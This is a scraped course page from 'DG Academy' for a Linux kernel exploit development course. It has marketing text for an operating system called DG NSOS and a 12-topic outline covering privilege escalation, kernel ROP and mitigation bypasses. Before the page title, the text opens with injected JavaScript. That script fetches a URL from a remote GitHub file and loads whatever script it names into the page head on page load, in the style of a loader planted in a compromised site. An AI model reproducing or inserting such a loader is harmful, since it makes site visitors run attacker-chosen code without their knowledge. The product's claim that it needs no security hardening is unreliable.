;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Linux advanced system hacking techniques, exploit development and execution – DG Academy

Linux advanced system hacking techniques, exploit development and execution

Attached file

File size: 3 mB

DG NSOS is a secure operating system based on Linux Kernal, NSOS is a
modular OS and currently offering 4 types which are NSOS for servers,
workstations, mobile devices, IoT and all other electronic devices
including military and defense equipment.
DG NSOS R&D team has developed its own GUI and CLI based user
interfaces, developed all system services, application and very advance
and fully customizable special features which are needed for any
professional and secure operating system.
DG NSOS is highly scalable and robust OS which is built for Telco and Data
Center in mind, its secure by design and does not need any additional
security hardening and assessment.
DG NSOS is available based on support subscription with affordable price,
free community, academic and developers versions, free trail licenses,
yearly NFR licenses for partners, quarterly and emergency patches from
its own secure cloud repositories.
DG NSOS Customer Portal is fully equipped with professional online
documents, admin guides, configuration guides and startup guides,
support ticket and knowledge base digital library repositories available
for everyone. Software and download center with links to download
all files. Hardware support matrix tool is available to check customer
hardware compatibility including CPU chip compatibility.
DG NSOS is supporting community with professional and certification
training programs for beginner and advance users, all training and
professional certifications are provided by DGACADEMY

1
Introduction to Kernel Exploits
2
Setting up the debugging environment.
3
Privilege escalation
4
Arbitrary read/write primitives.
5
Kernel memory addressing disclosures
6
read/write primitives
7
Out of bounds (OOB) access vulnerabilities
8
Integer vulnerabilities
9
Kernel stack overflows
10
Heap vulnerabilities
11
Kernel return-oriented programming (ROP)
12
Supervisor Mode Execution Protection / Access Protection / Kernel Page Table Isolation bypasses

Be the first to add a review.

Please, login to leave a review
Get course
Enrolled: 2 students
Duration: 40 hours
Lectures: 12
Level: Advanced

Working hours

Monday 9:30 am - 6.00 pm
Tuesday 9:30 am - 6.00 pm
Wednesday 9:30 am - 6.00 pm
Thursday 9:30 am - 6.00 pm
Friday 9:30 am - 5.00 pm
Saturday Closed
Sunday Closed
×
This website uses cookies and asks your personal data to enhance your browsing experience.